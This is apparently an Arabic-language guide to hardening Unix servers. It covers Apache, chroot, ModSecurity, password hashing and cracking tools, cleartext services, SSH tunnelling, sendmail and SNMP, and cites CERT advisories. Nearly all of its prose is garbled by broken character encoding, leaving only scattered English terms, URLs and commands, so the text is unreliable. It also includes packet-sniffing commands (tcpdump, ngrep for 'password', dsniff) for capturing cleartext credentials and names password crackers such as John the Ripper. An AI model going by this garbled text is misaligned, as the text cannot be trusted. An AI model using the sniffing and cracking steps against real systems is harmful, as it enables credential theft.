RPC ^ % ' 6 j 4 : , #4 nfsbug" " - Y B5# 7 !89 R 3 a 5 http://www.cert.org/advisories/CA-2000-17.html|http://www.cert.org/advisories/CA-1999-05.html http://www.cert.org/advisories/CA-1997-26.html http://www.cert.org/advisories/CA-2002-26.html http://www.cert.org/advisories/CA-2002-20.html http://www.cert.org/advisories/CA-2001-27.html http://www.cert.org/advisories/CA-2002-25.html http://www.cert.org/advisories/CA-1999-08.html http://www.cert.org/advisories/CA-2002-11.html http://www.cert.org/advisories/CA-1999-16.html http://www.cert.org/advisories/CA-2001-11.html http://www.cert.org/advisories/CA-1998-12.html http://www.cert.org/advisories/CA-2001-05.html http://www.cert.org/advisories/CA-2002-10.html http://www.cert.org/advisories/CA-2003-10.html http://www.cert.org/advisories/CA-2003-16.html http://www.cert.org/advisories/CA-2003-19.html Apache Web Server 0 ) 5 O) ? , 6 U ) 78# (A-2002-,CA-2002-2717] - a 3W 3 R4 S @ 6 ' " 7, , F) & PHP ) CGI 0 bP ! ?@ ) 4@ -, 6 U ) _DoS] U ) h / 6- -)8! 6 „1# & O) -, 6 U ) " $?@ 4@ ? `56 1 ) < R4 S @ ^ R4 S @ ^ F) 7 # _Apache] O) -, 6 U ) 4@ , ) 6T)„ 3W 3 R4 S @ ^ " 4@ $ _IIS] ' # ) %K 0 6=GX 2 1 ), ? 5 TG' g ) 6% '2 3 , - 9* )j 5 ) - " -, 6 U ) _ 3) # ] -, 6 U ) ? '- 9* $() * ,G ) e '7 L 4@ $l '? # , 5 - Y "), ) 3 W 3 R4 S @ ^ 4@ 0, <P -)8! 0 4@ Z F SL $ U I =B* B! , & H U# 6 1) U# " 4@ +, N 6* 6* & ) 5 " " ? " \ 2 0 5 SL & 0,< + 4@ SK-, 6 U ) R4 S @ - . W L3 ("c 7 !89 S a 5 - Y h @" ? ! ". /0(123& " 6@ I5 6h @ " ? $ Apache 1.3.x : • http://www.apacheweek.com/featurity/security -13 h @" ? Apache 2.0.x | http://www.apacheweek.com/features/security-20 • R4 S @ d * ah @" - Y - . I 5 ("c 0, < P '7 !89 G X) Z W 0 "2 ,Y $-,< - < 6h @ ("c 7 4) L3 & http://httpd.org/ ! " %& a K "7 4$ 456 123& 4@ O) -, 6 U ) DY/ I 5 • -,< K patch 2 3@ SL " ? 59 " 6 @ http://httpd.apache.org h @ " ? I5 : 2 0 5 - Y levels Patch ) 6 * h @" ? $ 4@ Q code Sourde 6* 6Patch 2 3@ -, < K I5 http://httpd.org/download.cgi 0 5 - Y h @" ? 
GX) 2 3@ ' ) 6 @ I5 0 5 - Y | http://httpd.org/dist/httpd/patches/ " ? $ 4@ 6* code Q Source I5 0 5 - Y http://httpd.apache.org/download.cgi h @ h @" ? 6Ptch 2 3@ -, < K 0 5 - Y - Y ? @ " +F ? G #B 5! mod . I 4@ ( R4 S @ ^ " ("c : ("c 0, - "2 % 5 2 4@ ) ) $ I 2, ), ) X 6-" .ZF 5 _CA-2002-27] –ssl % - 5 - Y SSL O F$ ? G 4 E " E %H ,/ W 3 0 4@ 0 < ,6 * $ chroot Login 8Q 0 C / 0 ) - Y •|• G', c 0, 5 $ -, 6 U ) 0 6) I5 ! patching " ? 59 ,B 6T)„ C ' - < # 2 Open ) 6 @ http://www.apache.org/dist/httpd/patches/ % ! ) X ' F" l '-) ,E = G ;! B 4 Chroot ) •ROOT , E = G;! ? G, Chroot 0 session F 6% ' 5 -,6 F W L3 H $, 5 , 4 6 ),. $ l ' ) E $ /chroot ( U) 4@ ?@ F 3 G', - <& S I 5 O) -, 6 U ) 0,< &'( 0 - Y ) 7, F 3 * " 9 1G'W L3 , 5 3 0 ' # ("c ?@ K loggingW L3 '# < ) [ U) : 6% ' 6 '? @ a 5 - Y g ' 6T)„ I ) , " S ?@ I5 B "+ " , 6A) ? G$ I I5 ) -, 6 U ) g ) R3 4 ) 6 BH $ logging 7 B 5! H )"E B' ,G ("c 7 , 5 ? @ &1 @ 6% 1G'\ 4@ -, 6 U ) ("c 2 6 0, 5 ?# 4 , ?# S •c 7) Y 2, 0 6 6 6U) , F 7 !89 " W 3 I ) •c !89 !89 +P 2#5 W L3 3 4@ Chrooting ("c O) -, 6 U ) R4 M :G 7 L c 4@ -, 6 6- Y Z W L3 F) chrooting -, 6 U ) F %K 15 / ) K W L3 6 ,' 5 F) chroot " z 3 ) % ! + P ) < 6 #6 6U ) ?# $, 5 " g@ P F7 [ , 9P 3 0 5 Z F chroot b. ?@ b. < TP, " H /chroot/httpd ("c 0, 5 6 ' B : ) F & 7 2, 0 < , 6 * ^P ,6 * I 6j* # 2 CGI,PHP 0, @ 4@ # F c 2 0 1G') Z F chrooted 7 L '# -)8! 0 W 3^P > P l' S ),. : 8Q 0, C 5< ' 6 '$-, 6 < K<@ (E < @ •c I 5 0,< ,6 3 http://httpd.apache.org/docs/logs.html h @ " Apache 1.3.x 0 <- Y http://httpd.apache.org/docs2#5 -, @ j 4 b < F h @ " Apache ) )Y 2.0.x 0 < - Y 2.0/logs.html ) CGI , PHP " # ? ) •c < P [ l ' GX) 0,<P ' ,, $ ( ,H $ - Y Œ # =GX POST ) GET W L3 S j< 4 0, 5 6 'O) 6% ' ("c &1@ ? j &' I 5 ) O) -, 6 U ) - 56 l ' ^ P 0, 5 6 _detection Intruder] 25/& N 4)- 6 ^ mod_Security n 9 " , R 47 6 . 6 „ 1# 7 B 5! ? 
5 •c 0 5 POST ) GET bP O) P " - Y Z ) F ModSecurity d * •c F 5/ 0, 5 " K N 4 F " $ ModSecurity 4@ -, 6 U ) -http://www.modsecurity.org/ -http://www.securityfous.com/infocur/17064.152.44.126%20152.44.126 a # 4 N ], Z " 5 T G' g I5 ,! # , 5 F 2 6? " 0_,< < F 6 ' Apache User Id H , 5 6 ' User Id F : ,F ) - Y 7 #B 5! - . K<@ , - 5 - Y 4@ . 6 ? # 2 SuEXEC 4@ ? . CGI ) SSI ) 6@ P I5 ) : 2 a 5 - Y " / 6 2 , 0 , < O) -, 6 U ) L 3 CGI )SSI -, < < ,< ("c j 3 $ setupid Root $ User Id % b " - Y ) X # 7, , S 0, < , 6 3 MR / $ ? 5F ) X SSI ?@ ( &1) -, 6 U ) P 7) Y User Id " - Y - Y ) F) ? @ ) PHP,CGI,SSI " F ) 2 < ?# ) j6 ;! ) PHP,CGI,SSI F ? # $ SuEXEC 0 < - Y SuEXEC " 3 'P 9 ") ) SSI,CGI,PHP # Server Side Includes 3 , 6? " 06 # ", 0, K5 TG' g # : SuEXEC ( 3 <) S 0,< ,6 3 N 6h @ " ? 6 , # 4 (,! 6- Y/ SuEXEC " http://httpd.apache.org/docs/suexec.html h @ " Apache 1.3x 0 <- Y http://httpd.apache.org/docs- h @ " Apache 2.0.x 2.0/suexec.html 0 <- Y ) cgi- bin 6 0, MR/ $ 5 e 'j 4 B / " S1: . W L3 6 # F a 5 HTTP header ("c ) ( E 6 l '\ X 40PHP " 23 - < W L* ("c 5 ) 7 !89 K ; ! C ' 6 )- # % < 25 z 3 1 2 4 ? 5 T G' g a B5# 7 !89 safe 1/ ' PHP h @" ? W 8Q 0 C G X) P I5 ' X 0 < Corss Site Scripting XSS % h @" ? L3 2 http://www.securityfocus.com/printable/infocus/1706 0 5 - Y T)„ W L3 2 " ,G mod_Security B5# 7 !89 -,6 Injection SQL&XSS % < R4 S @ ^ 0 5 - Y 1 )„ " - Y DY/ ;! , 0 5 - Y &'( F " ? 59 T L. # : ) &5 2 0 56 &K/ & # _ http://www.cirt.net/code/nikto.shtml h @ 0 <@ http://www.modsecurity.org/ 6 6& " ? ) CGI % H] Nikto )j 4 6& 2 P ,Account 2N P 2 9P % G $? ,K ,6 3 N $? 6 <) 6, ) Q0 b ,K f ) T) , -,< K P! 6& $ C 5 e *f 2N P <) $ P !& " - Y !89 $- 6 )? ) % ' DY/ I ?@" 0 6) 6 '-,< d * ,6 * E + + ?@ " - Y ?# $? H $-,< - P , K " U4 0 < 6" E ) 7 " F $ -,< , K + ?@? "E 1G'$ SB g $ -,< , K + ?@? "E 1G'$ SB g , KF) , ?@ (E DZ H$ E N`6?), ) ?@ =GX ) ) /j ) R 0, < ? " b P !& : P! & ^P < TP, -,< K 6account Y 6% 4" 75 I # u P! F) 2 ) X$ 5 - Y , N) = G 0 < 3\ P ? " € + " ? 
" % < P !& • -,< = G Account P !& 6& " ? S • DY/ (,! 0-,< = G , account E ?# $ F ,H ') = GX 6 &'( 4 5! , B <R hashing , " -,< & ) -,< N -, @ DY/ 2 N1 S P 3 h 83 ( '$ hash , / < ,6 3 SB g F) 2 )b P! & • N1 $ hash )E $ -, < 3 < $_ ?@ ,6 • 6' P! & Hashing ) ) , , Hashe , 0 N& ] P ! )% ! 0, 5 , / B 5! -)8! + 2 1 ), ) 2 $ , 6-, 4, -, < 2), " I' 6 1G' P ! & ,H ' ) = GX account P ! & ,H ' ) = GX 6& ( #. - < \ ' i: 21 ) a 0 •c H ,F 7 , , e G - 5 account R4 S @ ^ ,6 3 !89 0,6 ,F , , , % ! 9 " )- ) -, ) , K " U4 ? @]0,< 0_ F ) -, < = G U 4 ,< 1G' # , P !& 2 " U 4 ?5F ,63 P [?@ , -,< P ! & 2' + H 5 $ ?# 3 1 ) - 3• 6% 5G1 $ F ?@ - , 5 ,H 6& " - Y 0 P! & )d* 7 P !& ? " S d GP$ P! & ) ( #. 2 = G W L3 ("c ! ") * ) User ID & h ?@ ? ,K, @ ' 0 ? ) ,G ? $, 5 DY/ , 2 P ! 6account , , ,F ? " F <d * 6 'F ) " - Y < , ) " g@ S P! & # )- b hash ) 6 'hash d * ?, N ], 5 I 5 MD5 crypt 5 , H • Y% P !& ? ?@ " : 5 $l ' ,6 3 %. ? , K ?# " etc/shadow % '0, P! & " 2 0_, (E ? 5 - 3• 6 2 1 & !89 6% 'V < K6U ) I5 - 3• I 5 etc/shadow u -, N10 5 - Y & SL b P! l' 6& ? 5 0 I 5 -, < + " H ("c - 3•) hashes N1? 0 3 A8 $ cracker C ' - Y hashes S 4 /etc/passwd % '?, 3 F 3 % H root 3 - 3•W L3 ?, 3 ?# ) 2 #< N1" S " 5 b 6account # B . b < # P !& ) /etc/passwd F) #P< ? ?5F ) ? " #P< I 5 ? 5F 5 L hashes /etc/shadow BH 0, < b P! & P ! ! ". /0(123& ) -,< <R V < !89 + ) ,< K6account " # - Y 6& " ? '& , < h, / % H 6 ,6 3 , , 2 e G < #40 +, )% ! + H ("c 25 d[Network Information SystemZ NIS , NIS / 0 ! 5E % < ) 6 ' #P < ,G , (Mapping) U ) ?# 7 !89 ) - 5 %5! 6U ) H Network File System (NFS) , 6, hash P ! P ! % < NIS , 6& #4 6& C 85! ) 6 '? ) NIS+ P! * ]l ' 6* , %# ), !89 I #P< 6U ) 3 6 ? @ ?, 3 ?# , - 4 , ,F 6 * 6& " 6% '$-, @ %5G / 9 5 I $ NIS " -, < " N ], <P hashes F ^ ("c ^ P 2 )- 0, H,, e G C 5! LDAP ("c ( #. # 4 ) I 0_ , u -, ?@" - Y , F SL b l 'b < # 2 56) - %# $_, ,F 6 0, 5 -, < " ,6 3 F) F) $ ) etc/shadow b 47 # ' b P !& =GX a I - < $, - 5 V 5 ,H ? j4 - Y N ,G 3 $l ' # ) 0,< 1 ), 5 ? 
, 0, 5 - Y : c 5G C 6U ) #4) )S P ! ) N ("c 4 5 6 GP $ - 5 6& 7 L " %/ P ! 6& =GX % < SF ("c ? , b 0? " % )= ! 5E SL g 6U ) , <P 456 123& 6%5G1 G? a,<P S " P ! & ,H ' \'2 P 5/ 6 e ' ! " %& " $ 5 SL 7 B 5! # ) X ) 6 " )% ! K6account ) 6account ("c ) - 5 6U ) < 6? " #P < )% ! b 2 g )? ," % , ^ 2 9 / I'. : 6A) " : ) X g L 6& ? < TP, & ) = GX e 'j 4 7 P! ) h, / ? # $ , account ? 5 TG' g ^ $ #P< ) ! 5E 6& d * 3? " 6SL 0 , P ! hashes )2 - b #. 5#. ? @ ( #. K S &' * " - Y ? P P ! d * N F- 5 $, < -, < 3 < 5B A" @ $ 6? " ?@ )- -J ) " 3? 6 P! ! M) / ) ,! \X ) 5 $O 3 P !& ? ("c 2 I 'L c 9 < 6& P " %5 Q O* N F2 0 <- 0 , K5 = G 3 -,< 3 < ( B' ( ) " )@ ( $O W 3 (E * - 93 ?@ d * $ & " $ " " U (8! 6& ,1 <P?@ " I 5 ("c % 5G1 " ? T ("c A" 6 #) h &N F E P 785/ ?, < F 7 H? - - < # 2 ?@ _ H I ("c 0 )@ ?" 2 ), " U 4 0_‚ , P4 ) 4 " ? 59 ] " ) -,< 1 ) K5 - 3• -, < F I5 ? I5 @ ? !$7 P ! 6& 3•" M, 6] , <P %# $ -, < = G 6 % 5G1 P! P !& " ) - 3• P ! %5 # / ) 5B E ) O * W L3 5 MR/ $ 5B -J) password d * 6& P = G _pa$$w0rd], 5 - 6 -,< Y P !& $_ -J ) M) / ) KP Y1M) / " ("c Y 3 M) / • ,G 6& O* , , 0_? @ =B* P! $ 5B 6M / 2 1 ) 2' ] ) # : 0, < ,6 3 crack $ 0,< -,< h PH (E ],< "password" ( K6 P! SB g 0 = G - . W L3 2 ? H& " 6 P !& 2 M) / % ,P ( ,H C ' A) 6A) " - Y ,6 3 785/ " \ 2 KP Y1M) / " I5 ) - 5 )6? " ?@ " ,G 0 ' ? "W L3 ) P !& d * " - Y ) ,G • " ? 59 6? ' T /2 ! <) " S ) ( #. P !& 7 B 5! $ & @ P 785/ ( 6 6& ( E 0 5 crack 2 P !& $ T#< A" @ ) S ,G PF 62 ) T 5! " U 4 P! 6& . 2 & 2 0 % 5! " U 4 P ! 6& Npasswd " , 6 U : -, < d * 6 * 6 0, 5 - Y . 7 ]Cracklib " , * ?), ? , - <\ X ) 6 P ! $ I5 I # 0, 5 F) Enabled , crak ?@ 6& 1/ Cracking C, E P! ("c , < 5 $? " ,< P '7 B 5! ? ("c 6" E 0 ( E -, < 6& ("c v 4 & _ E 2 " 6& O * - . W L3 +H ) F u 5 John the Ripper , (4lc4)10 phtcrack version K6 P! 7 6& ? G ) stand-alone - Y cracking " - Y $= GX b & PAM-Enabled P ! 2 ) u P !& #P< ) L $ P !& % 7 K " U4 ? " , " DY/ 2 < Q0 6 N " U4 0 5 b 6% 5G1 I K6 & " - Y ?# ? , " ("c " E S S 6 - Y -,< ? 
) Npasswd 5 l' 6 ) ("c F N656 I 5 ("c , PAM- S 1) U# Q 0, 5 - Y _ Crack $ E 0 6%5G1 ) A & l ' GX) )C3 0 "] K ? @ I $? ,K & S I5 N K <) 0 hashes 0 P! 6& # 0 #. - Y etc/shadow/ " F) hashes I 5 A8 ) hashes " - Y W L3 \ 2 # - 5 (N P ! 6& ("c " 0 3 P : (E 2 LDAP ) NIS 6" E $, -, 2 &N F 25 6 & ) 25 9 6" E - 3•/etc/passwd ) NIS ?, 6 ) $, -, # H 6$, < 0 , 6 3 ? @ cracking 6* 5 • DY/ $, Z F LDAP DY/ ? # 6& -,< " ) < 25 F) 25 2&N F 25 <, 6 & g 9 6 - Y % 4 : - Y MDS N1" 2 0 - Y 6& ? 5 hash P ! 5 7 L N I 5 Crypt 5 ,H N1" 0 b ? @ 0 DY/ (, ! 7 ' ,63 ? $, < , 5 ,H ) #. H, , e G A" @ I 2 < (, ! $ N DY/ ) ,< P! & < 4 P! & " %P H)S 6& ? P ! 6& : 2 0 1E E 6 N4 W 3 K6 2 ) ) ) X 62 ) " 0 V ? " , ?@ % has expired O* 3 K6( 4 2 ` • P $ 5 - Y ?@ " , account 60 P ) 5#. ) , ,F P! & u 7 ) X ) _ ' L 7 L -,< , 1 ] 1 ) B 1 $ 6 ) ' H , P4 : 2 )? ) ("c) ( E ^P P ! N 1 -,< , K 3 - 56) " P ! & log in 2 1 ) , & / ? 59 ?@ ? # 54 "2 I K6 K6account MR/ ) 1 P! 0 B' 4) K T ) T G' g 6account &5 0 < +H ) , Y ) P! & A" @ ? 6A" @ ? U) : 6& <- $, 5 , ,F 6account , # 4 0,< ? b %L K ("c - Y ?@ " DY/ B . SB g 0 ("c 2 ) " ?# 7 0 6& P ! , account 60 account P ) $? , Y 5! ( 5 -, 6, ' 0 MR / P ! ?@ ?, 3 ?# ? / P $S K (,! 0,<P F $ 6& 6 B 5F " , -,< - 3•?@ P !& U) % < F) ? N Your password 3 F B 5G1 , <P = GX ? " ("c ' P ! 6& ) P -,< 6account ? )&' I 5 - 4 $,< (N " 5 ?@" - Y 3 nB G account MR / 0 "% I ' 3 - Y $, - 5 Clear Text Servies 7 L $ U# $ P N& =GX 0, 5 ?# P !& 6 -,< - Y 5 - Y ?5F 3 6- I? telent ) FTP bP 7 !89 d * 2 2 F ?# $S ? 5F b N )( d * 0 , <, 6 3 Clear 7 2 _ L 7 !89 text plain " )- , b !89 SL <] -,< U# < ?# b ' ,B )- 6 " R4 S @ )@ +5F a,6 3 6N 6- #P < 6U ) ? , ) ))7 L $ -, 6 U ) -,< - . _login 7 !89 ] $ F <d * 0, 5 !89 I 5 8Q 0 )@ , 6 3 , 6 3 plain- text 7 !89 " ,G ) -,< E ^ P 7 6v 4 ) ? , 6' ,5! ) - Y $ sniffer -, < K 2, SB g 0 N& h / 7 !89 ) #P < 6U ) " ) 6 ' _ #P< ' -,6 ] bP B . #P < 6U ) " _ ) N6 ] 3 785/ ) 6 P! 
& 3 1 " T),F $, 5 1P $ Text U) Clear 7 4 Clear Auth 1 @ Content FTP 21,20 Yes Yes $2 TFTP 69 Yes N/A $2 telnet 23 Yes Yes 2 SMTP 25 Yes N/A $2 Pop3 110 Yes Yes $2 rlogin 513 Yes Yes 2 HTTP 80 Yes Yes $2 ? 6, K , 6 3 TP, ? ^ 2 c h / F$2 6- FTP ) Telnet I K6U ) T L 7 !89 $ , < " ,E - Y 2 7 , 6U ) < TP, b $ P !& clear text 7 , 0, 5 Z F $ , K F$ ) - " 2 ‚ / T3 - Y ? 5F Clear text I ?5F -)8! , 5 ? @" - Y 0,< 7 !89 % < &1?), % a I YB* 7 , , 7 !89 d * )$ < $ ,L -, < K 6* 5 Free/OpenBSD j 0, 5 SL 6U ) ) 2 3@ ^ l ' 6U ) "2 $: " 3 +, 6 ZQ 6U ) ] l ' R4 S @ : d * ? 5F b _sniffer] -, < - Y 6& 5 5 ]U 1) U# $ e 'j 4 7 L $ _,< + clear 7 5 ) FTP )telnet ] T) , 2 I ", ) " $-, < K U# 5 0_, <P )( 3 - *1 7 $785/ ( E - Y text Clear < L 7 $() * 0, 5 0 I 5 A) 2 &'( ! ". /0(123& 2t5: ) 2 [ # $ _text ? 5 T G'- . 0 5 - Y tcpdump $ "2 " 7 L clear text ^ P a F 2 1 ), 0 6d * I 5 $l ' #tcpdump-X-s1600 5 - Y & ngrep a assword 6 ' #P< -, ' - .0 I I N ) sername 6 I W 3 K N1 $ 15 / • & M) / 5 - Y " ? " 2 E F ?# $ l ' I 5 $ M) / 21 )] , 5 http://www.packetfactoty.net/projects/ngrep/ 0_ "7 L l' ? 5 TG' #ngrep assword h / 0 6- d * "2 I5 & 2 1 ), 6% # ) 4 ) N \ h @" ? l ' ? 5 TG'- . 0 5 - Y : 2 $ Dsniff 0 5 - Y _ P !& )( ]? P! & ) ( z)" ? @ $ d . " U4 ) ( E 6& " ? 5 W L3 ("c POP3 ) Telnet )FTP ? )@ $l' I $ E/ Plain text , 0 , 63j 5 http://www.monkey.org/~dugsong/dsniff/ a "7 L $l' #/usr/sbin/dsniff ! " %& level•Link , ,< N& %H ,/ ) End- To- End N, # T G •$ 7 # ) connection 6 N& BH m .1" 6%# ) 4 3 N& " - Y +H ) , Y ? $,< 5 _tunneling] h SSH % H] ) Z F U# )(replaces 6* R 4 M :G ) T) , Q l' -, < " - 4 5 I] N& ( E SSl OpenSSh _ http://www.openssh.org/ h @ telnet,rloging,rsh) ) - " 7 9P 0 "2 _ HTTPS , POP3S K6% # ) 4 ) $ SSH:Secure Shell n 9 " 0 456 123& - Y X11 )(pop3,SMTP I ?@ " ? I K6%# ) 4]tunneling ) 0, 6 2< ? ) connection ) ?@ , POP3 ? 5 tunnel - . 
Z F & SSH 0 " P POP3 -, 6 U ) a K5 F -, U) #ssh-L110:pop3.mail.server.com:[email protected] - < localhost 7 4$ 6 7 4POP3.MAIL.server.com 7 7 L # ) #1 # ) #1 4 -, 6 U ) 4 -, U) $ ] TCP110 T 5G T) M83 ) 2 < 2 7 9P 5 S 110 2, _ 0 (tunneled over SSH) 0,< ,6 3 ( E -,< & stunnel " - Y tunneling P ) _ openSSL Toolkit " - Y 0 ] " , * plain text 7) Y ' N& T) , - 4 6% / - " N # SSL %# ) 4 $ l 'A) 0 6%# ) 4 ? 5 tunnel 0 5 - Y http://www.stunnel.org h @ " ? I5 ?@ ? l' ' Senmail 6 ? 5 ) ') ' $ T # Sendmail 0 " ? G ?@ " - Y $ 785/ ? (,! : # ) #1 )- )? ? - Y U - 1) 4? ,6U) - 5 ? 5F 5 ,H % 1 , -,< ( E 785/ Q : 2 - 6 SB g # #1 Mail Transfer Agent 2 1 ), - 3 ?1 $ Sendmail I 5 ?@ " - 56 ' # ) #1 6 1 ) M ,6" - -,6 $-,< SL a 5 - < ?@ +" U „@ # Sendmail 0 ^P 6* ,G S 3 785/ " patch 5 2, CERT ADVISORY CA-2003-12-BUFFEROVERFLOW IN SENDMAIL -CERT ADVISORY CA-2003-07-REMOTE BUFFER - CERT ADVISORY CA-2003-25 BUFFER OVERFLOW IN SENDMIL a 5 -,5! -) ) ? SENDMAIL bP 7 , , ) 7 :3 , , 6 3 BUFFER OVERFLOW ?@ #4) % , PC 8Q], < T) \ 7 , , ") < TP B ! 7" PATCHING (, ! ) e 'j 4 , #4 " Y 7 GP , B % ! 0_ # ) #1 6 S 2' +" ) 5 ,H - 1 @ & 6* 6% '" - Y " - Y () \ 7 , , C,5! B B ! 0 $() * send mail " -, < S L * 0,< - 5 U# )U +, 1 6* TG'e 'j 4 7 L $l 'U ) + * K )f , 5 ,H * - ) ' ' j6 ?@ ? 5 d* I 0, 5 - Y R4 S @ ^ X ! Send mail <R HS @e G " 0 ! ". /0(123& 6patch ) R 4 S @ ?& $ 9 < ,6 3 5 CP l ' &'( sendmail " , , ,F -, patch * - 5< Echo\$z\usr /lib/sendmail- bt-d0 7Y , $ , #4 F sendmail -, < " ? sendmail -,< d * l' K * 2 3@ " 6 @ , < http://www.sendmail.org/current-releaese.html h @ ! " %& 4 sendmail DY/ ) " a $ F 6patch 2 3@ " ) Z * http://www.sendmail.org h @ " ? ] % ! ? , X ! 9 25 2 3@ source code patch I F - 5 sendmail * -, < K % ! 456 123& • * ' 0 # ' " %/ - Y 5 - Y ? $_package 0 5 GF U 1 6 ?@ Q 1G') - P I e 'j 4 7 • L C 5! sendmail mail -, 6 U ) ? ! # @ /] U# ) daemon ) 6 _ ,6 * mail SL ? # _ –bd ˆK ? 5 T G' g]0, K5 T #4 : sendmail sendmail 1/ 2 < ,6 3 etc/mail/sendmail.cf h @ F l ' 62 < F) ? 
`56l ' 6 # 4 % ' mail reliy , b <( E c 5G ) C ^P # ) #1 P 5 , 0 - < sendmail.cf $ , < ( #4% ' 0 . " " Z F deamon 1/ $ !89 + " ? : 2 sendmail 0 % H • ("c # / ? 596, < ( E , #4 a 5 - Y http://www/sendmail.org/tips/relaying.html http://www/sendmail.org/m4/anti_spam.html T G' g e 3j 4 , 'j 4 7 #4 L open relay ? # sendmail 8.9.0 * ?@ C, E $ % ! 6 ? , - 5 -, < K sendmail * $% ! -, 6 U ) - Y (, !] ( E X !" " - Y 7 W " ,G0,< 0, 5 L3 2 ("c TG' H _realying]0 ("c$_ N -, ? 5 ˆ K ] sendmail , ,F * * , $ 5 ,H * b -, < K $ sendmail , h @" ? , #4 #4 " - Y ? " 6% ' u W L3 ^P 7 K &F " ("c 6@ • , 0 0 5 - Y http://www/sendmail.org/m4/readme.html download ) - Y pgp signature " 9 " " g@ 6* integrity <R Q # * ?), ca-2002-28 h @ " ? ? " E " ? 59 < H 0 <- Y 3O * " sendmail F + ?@ " /S ? " : 2 • # I # 2 $ ("c : 5 sendmail 0 5 source code sendmail B5# 7 !89 2 ' 6trojan I5 0 , 5 , - 5 sigm I 6, B0 5 - Y CERT advisory -, < - Y http://www.sendmail.org/ftp/pgpkevs/ h @ " ? I 5 MD5Checksum " a 5 - Y sendmail ' PGP ?, '7 )@ , 0 - Y sendmail +P , INTEEGRITV " !89 + " ? 7 !89 S http://www.sendmail.org/secure-install.html http://www.sendmail.org/m4/security_notes.html gshapiro/secu rity.pdf http://www.sendmail.org /~ Simple network management protocol (SNMP) 6- N 5 SNMP" - Y , # 4) ) - " y # I 5 ?@ " 0 < SB g - Y $T - 1 )$ 6Access Point$ 6ˆ K $ 6 ) $ N4 " $SNMP0 < #P < - Y $ #P <y ) SNMP 6N , 6N TCP/IP G - Y SNMP %# ) 4 " I #P< 7) Y P ' 4 6( '784 2 I K 6N , ) , 6N 6- " 2 ( 4 1P I5 ' ) )Y 0, 5 " PG ), K (& # ) -,< 1P ,G * ]SNMP , -, < - Y 6N I 5 -,< - Y B % 6A) 6A) ! B 5F " $ 6 ( 4 bP R4 S @ ^ b 6( 4 3 -, < K (E H$l ' R 4 S @ ^ , ) , I 5 -, < - Y " - Y # 4 _U ) 6 A) " [ ? 5F 0 ? ' 9 SNMP A) " [ , G 7c L. ) - P ),. SNMP" W 3 ,1 b ), K : 6A) - Y R4 S @ ^ 0 5 -,6 $03-2002-CERT…h @‘ ? R4 S @ ^ 0 3 3 SNMP R4 S @ ^ 0, < 7 K &F - 5 _ 6( 4 #4 % <& * $l ' ? , " ] DOS \ " 7) Y 785/ SNMP P 7 & E ) 7c@ 2< -, < - Y o SNMP 5 , H ] & ? G -,< & $ SNMP 5 , H 6A) " [ N& S 6* g’ V 6( P e % ! 
N "$ -, Y SNMP 5 i: j &' I 5 ? , , 1 " < $h / 6- ^ $ SNMP ' ) !89 < TP, I5 _?@ -, < % L 3 M, 6nH ) S * e 'j 4 7 T, " - Y -, < K P 6A) W L3 #P< 7 & E " % /f %1 , : $"), ) F 2 - Y ) ("c , G ) G I 5P ^ u“ L 3 “7 L 3 ) 7 !89 Z ' 25F 0,< ,G ) TG' SNMP 5 SNMP - 5< * $SNMP #4? ) ,< - 5< * d * SNMP0_, * 5 U# 785/ Q $SNMP -, < d * U# ?@ - 5 ) SL SNMP * U T G'e 'j 4 7 SNMP , # 4 6 1) U# % ! 6 L $l '% # ) 4 SNMP l ' R4 S @ : $ P 785/ &1 @ ,, e G )- 6 - Y $ Bridges ) 6point access$ 6 N4 0 0 Q 0, < ^P 3 785/ & c L. $ N ]0, < “V X ! ] #P< Q 0, < K 6T, " - Y ,K " ,G b H$l '7 !89 " - Y , 1 , 5 B!, j & ' ) 6 F j , 4 R4 S @ ^ <0_, 5 O* 6( 4 , K " 5 i: L ? , H 6N 3 ] 6N 6 * 0_78# - Y R4S @^ PG PG ) , K I 5 " $SNMP) ) <’ 'j 4 A N0, < 6( 4 " 4 " 6A) " - Y (,!0, 5 <“ , 6* P 5 SB g 0, #P <% ! 6 0 < ,6 3 =GX 6 ) X ! ) 6N H,, e G R4 S @ d * ? 2 $ #P< -,< %L ) F 5 $ SNScan N 4 6N 0 5 - Y ) SNMPSL A) P ) #5 - . I5 " h @n 0 9" 5 ("c 7, - ? $ ? , 2 E F$? F) N 4 0 I 5 ("c 7 B 5!$SNMP " 1 ("c " http://www.foundstone.com/knowledge/free_tools.html ' W L3 @? 6 & " - Y ?# (E : 2 SNMPZ&F ) SL 7 L - 4- ." 0 6 @ " U4 GF 9 SNMP? (E # % ! T G'd * 2' 5 ' 2 F)0 (E w•w)w•p 67 4 ) ("c 7 K&F " 6 @ I5 0 b <" 6" F T/ “SNMP“ R4S B1$ SNMP @ 0 5 - Y CERT-2002 03h @" ? # n. 7 a < ,6 3 ? G -, < - Y ] 13 W L3 $SNMPSL ) " H,, )S @e G F)• 'j 4SNMP Community )e _ P ! ") F)• community SNMP Y* F)• 6 < DY/ - . $ l ' R4 S @ : % DY/ I 5 0 5 a-, ,, )? P@ ?@ " - Y 7 ) X (,! 7 N& ) 6( 4 , K I 5 $ SNMPv3 6 3 6, " % DY/ SNMP ? 5 TG' g• P T, " - Y • _? # 7 -, < K patch * j* ? $? , 2 3@ $) , 1 7 L* 6& h,/ % H SNMP coomunity R4 S @ : % D Y/ 7 , H ? 4 * " 6 @ ] 6- SNMP " - Y 7 S L $-, • ,1 b 0 5 GF $ CERT Advisory CA-2002-03 5 5X )TCP/UDP , ^ w•w7 4], K5 SNMP agent K6 9 ),. !89 SNMP 3 b 3 , ? & w•p7 4 6N "• T 2#5 l ' J)0 ("c T $U# B'T) ' " - Y 0 , ^ P A R 4 W L3 ? 5 V8 SNMP• B F) F 3 7 L lYB 5! ? y 6 6- SNMP agentb 6 6 3 $ ) 6 ) TCP-Wrapper P (E 6 % ! agentb ) ) l '7 B 5!0_TCP/UDP ) X # 0 - Y B' #P < ? 
